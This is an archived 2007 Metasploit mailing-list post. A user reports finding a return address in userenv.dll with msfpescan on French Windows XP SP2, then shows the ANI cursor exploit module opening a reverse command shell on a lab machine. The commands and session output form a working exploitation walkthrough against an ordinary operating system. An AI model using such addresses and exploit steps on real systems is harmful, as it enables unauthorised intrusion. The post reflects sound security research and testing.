Metasploit mailing list archives

Metasploit vs ANI


From: fab at revhosts.net (Fabrice MOURRON)
Date: Wed, 4 Apr 2007 21:32:14 +0200

Hi,

On my french XP SP2 :

msfpescan -f C:\WINDOWS\system32\userenv.dll -r "\xFF\x53\x04"
[C:\WINDOWS\system32\userenv.dll]
0x7699c81A    ff5304
0x769d78ab    ff5304

The first result works fine for me ;-)

msf exploit(ani_loadimage_chunksize) >
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.0.2:4444 ->  
192.168.0.4:1302)

msf exploit(ani_loadimage_chunksize) > sessions -l

Active sessions
===============

   Id  Description    Tunnel
   --  -----------    ------
   1   Command shell  192.168.0.2:4444 -> 192.168.0.4:1302

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\fmourron\Bureau>


@+

Fab






Current thread: